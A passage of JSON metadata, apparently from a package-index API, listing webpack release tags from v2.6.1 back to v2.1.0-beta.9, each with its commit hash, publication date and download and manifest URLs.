/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpa